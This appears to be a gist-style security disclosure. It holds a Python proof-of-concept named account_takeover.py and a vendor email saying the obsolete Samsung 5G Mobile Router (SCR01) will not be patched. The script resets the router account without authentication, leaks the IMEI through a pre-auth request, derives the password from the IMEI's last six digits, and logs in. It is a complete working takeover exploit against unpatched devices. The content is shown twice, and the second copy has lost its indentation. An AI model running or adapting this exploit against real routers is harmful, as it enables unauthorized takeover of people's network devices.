stypr · April 24, 2025 10:19
diff --git a/account_takeover.py b/account_takeover.py
 import os
 import time
 import uuid
 import requests
 requests.packages.urllib3.disable_warnings()

 headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "en-US,en;q=0.5",
    "Content-Type": "application/json;charset=utf-8",
    "Sec-GPC": "1",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Priority": "u=0",
    "DNT": "1",
 }
 HOST = ""

 def login(password):
    url = f"https://{HOST}/_set/mhs"
    data = {"signin:password:s": password}
    r = requests.post(url, headers=headers, json=data, verify=False)
    response = r.json()
    if response.get("csrf_token:s"):
        return response.get("csrf_token:s")
    else:
        return None

 def reset_account():
    # reset password will set password to last 6 digits of IMEI.
    url = f"https://{HOST}/_set/mhs"
    data = {"signin:reset_account:b": "true"}
    r = requests.post(url, headers=headers, json=data, verify=False)
    response = r.json()
    return response

 def account_bypass():
    # Reset password so that password is based on IMEI
    print("Reset account...")
    reset_account()

    # Leak IMEI
    print("Leak IMEI...")
    imei = -1
    while not imei or imei == -1:
        imei = leak_imei().get("more_settings:o", {}).get("imei:s")
        if not imei:
            print("Retry leak..")
    print(f"Leaked IMEI: {imei}")

    # Attempt login based on leaked IMEI
    password = imei[-6:]
    print(f"Password: {password}")
    login_result = login(password)
    if login_result:
        print(f"Login success! CSRF: {login_result}")
        headers['X-Csrf-Token'] = login_result
        return password

    print("Login failed..")
    return None

 def leak_imei():
    url = f"https://{HOST}/_get/mhs"
    data = {
        # more_settings directly leaks info from pre-auth which isn't supposed to happen.
        # This forcefully leaks IMEI and phone info.
        "more_settings:o": {
            "imei:s":"",
        },
        "signin:wifi_connection:s":"",
        "signin:device_name:s":"",
        "signin:default_password:b":"",
        "communication:mode:i":"",
        "communication:hs_mode:b":"",
        "signin:update_software:s":"",
        "signin:first_time_to_access:b":"",
    }

    r = requests.post(url, headers=headers, json=data, verify=False)
    return r.json()

 if __name__ == "__main__":
    HOST = "192.168.1.1"
    headers['Origin'] = f"https://{HOST}"
    headers['Referer'] = f"https://{HOST}/sign-in"
    password = account_bypass()
    session = login(password)
    print(session)
diff --git a/mail b/mail
 ```
 Hello Harold Kim,

 We sincerely apologize for late reply as we needed additional time to confirm this with the internal stakeholders.
 We are sorry to inform you that there is no planned updates for Samsung 5G Mobile Router(SCR01) since it is obsolete device.
 We are sorry again our reply did not meet your expectations.
 Thank you very much.

 Sincerely,
 Samsung Mobile Security
 ```
	import os
	import time
	import uuid
	import requests
	requests.packages.urllib3.disable_warnings()

	headers = {
	"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0",
	"Accept": "application/json, text/plain, /",
	"Accept-Language": "en-US,en;q=0.5",
	"Content-Type": "application/json;charset=utf-8",
	"Sec-GPC": "1",
	"Sec-Fetch-Dest": "empty",
	"Sec-Fetch-Mode": "cors",
	"Sec-Fetch-Site": "same-origin",
	"Priority": "u=0",
	"DNT": "1",
	}
	HOST = ""

	def login(password):
	url = f"https://{HOST}/_set/mhs"
	data = {"signin:password:s": password}
	r = requests.post(url, headers=headers, json=data, verify=False)
	response = r.json()
	if response.get("csrf_token:s"):
	return response.get("csrf_token:s")
	else:
	return None

	def reset_account():
	# reset password will set password to last 6 digits of IMEI.
	url = f"https://{HOST}/_set/mhs"
	data = {"signin:reset_account:b": "true"}
	r = requests.post(url, headers=headers, json=data, verify=False)
	response = r.json()
	return response

	def account_bypass():
	# Reset password so that password is based on IMEI
	print("Reset account...")
	reset_account()

	# Leak IMEI
	print("Leak IMEI...")
	imei = -1
	while not imei or imei == -1:
	imei = leak_imei().get("more_settings:o", {}).get("imei:s")
	if not imei:
	print("Retry leak..")
	print(f"Leaked IMEI: {imei}")

	# Attempt login based on leaked IMEI
	password = imei[-6:]
	print(f"Password: {password}")
	login_result = login(password)
	if login_result:
	print(f"Login success! CSRF: {login_result}")
	headers['X-Csrf-Token'] = login_result
	return password

	print("Login failed..")
	return None

	def leak_imei():
	url = f"https://{HOST}/_get/mhs"
	data = {
	# more_settings directly leaks info from pre-auth which isn't supposed to happen.
	# This forcefully leaks IMEI and phone info.
	"more_settings:o": {
	"imei:s":"",
	},
	"signin:wifi_connection:s":"",
	"signin:device_name:s":"",
	"signin:default_password:b":"",
	"communication:mode:i":"",
	"communication:hs_mode:b":"",
	"signin:update_software:s":"",
	"signin:first_time_to_access:b":"",
	}

	r = requests.post(url, headers=headers, json=data, verify=False)
	return r.json()

	if __name__ == "__main__":
	HOST = "192.168.1.1"
	headers['Origin'] = f"https://{HOST}"
	headers['Referer'] = f"https://{HOST}/sign-in"
	password = account_bypass()
	session = login(password)
	print(session)
	```
	Hello Harold Kim,

	We sincerely apologize for late reply as we needed additional time to confirm this with the internal stakeholders.
	We are sorry to inform you that there is no planned updates for Samsung 5G Mobile Router(SCR01) since it is obsolete device.
	We are sorry again our reply did not meet your expectations.
	Thank you very much.

	Sincerely,
	Samsung Mobile Security
	```